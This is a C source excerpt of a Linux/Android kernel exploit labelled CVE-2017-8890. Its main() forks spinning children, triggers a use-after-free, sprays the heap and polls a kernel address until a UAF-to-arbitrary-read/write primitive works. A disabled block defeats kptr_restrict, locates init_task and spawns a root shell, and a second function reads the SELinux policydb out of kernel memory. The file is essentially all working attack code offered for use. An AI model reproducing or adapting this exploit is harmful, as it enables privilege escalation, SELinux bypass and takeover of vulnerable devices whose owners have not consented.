int main(int argc, char *argv[])
{
    /*
     * Entry point. Records the CPU count, optionally forks parked children,
     * runs prepare() and trigger(), sprays, then polls read_at_address_pipe()
     * at a fixed kernel address until it returns 0 (the value this file treats
     * as success). Globals (cpu_num, cpuid, child, children_num) and the
     * helpers are defined elsewhere in the file. argc/argv are unused.
     */
    (void)argc;
    (void)argv;

    cpu_num = sysconf(_SC_NPROCESSORS_CONF);
    setbuf(stdout, NULL);  /* unbuffered, so progress lines appear immediately */
    printf("CVE-2017-8890 exploit. cpu_num : %d\n", cpu_num);
    printf("%s(), getpid : %d, gettid() : %d\n", __func__, getpid(), gettid());
#if FORKCHILD
    /* Each forked child announces itself and parks in an endless loop
     * (time() only returns 0 at the epoch, so the loop does not exit). */
    for (int i = 0; i < children_num; i++) {
        child[i] = fork();
        if (child[i] != 0)
            continue;
        printf("I'm child : %d\n", i);
        while (time((time_t *)NULL) != 0)
            ;
    }
#endif
    init_fake_obj();
    cpuid = sched_getcpu();

    /* err() exits with the given status; errors are fatal from here on. */
    if (prepare() < 0)
        err(-1, "prepare failed..");
    if (trigger() < 0)
        err(-1, "trigger failed...");
    keep_spraying(100);

    /* Retry a 4-byte read at the fixed address until the helper reports 0.
     * The significance of that address is not shown in this file. */
    char tester[8] = {0};
    while (read_at_address_pipe((void *)0xFFFFFFC000080000LL, tester, 4) != 0)
        ;
    printf("Turn UAF to arbitrary read/write succeeded.\n");

#if 0
    printf("[!] we're trying to find ksyms firstly.\n");
    if ( 1 != break_kptr_restrict() )
        err(-1, "ksym not found.");

    init_task = (size_t)get_kallsym_address("init_task", NULL);

    printf("init_task : %p\n", (void*)init_task);
    found_tsk_by_swapper(init_task);  /* in post_exp.c */

    system("/system/bin/sh");
    while(1);
#endif
    return 0;
}
/*
 * Copy sizeof(struct policydb) bytes from the address held in the file-scope
 * `policydb` into a temporary user-space struct via read_at_address_pipe(),
 * and return its sym_val_to_name[SYM_TYPES] entry.
 *
 * Returns NULL when the temporary allocation fails, when `policydb` is unset,
 * or when read_at_address_pipe() does not return 0 (the value this file treats
 * as success). The temporary copy is always freed before returning; the
 * returned pointer refers to memory outside this copy.
 */
static inline struct flex_array* __kernel get_types_fa()
{
	struct flex_array* __kernel result = NULL;
	struct policydb* copy = malloc(sizeof(*copy));

	if (copy == NULL)
		return NULL;

	/* Only attempt the read once the policydb address is known. */
	if (policydb && read_at_address_pipe(policydb, copy, sizeof(*copy)) == 0)
		result = copy->sym_val_to_name[SYM_TYPES];

	free(copy);
	return result;
}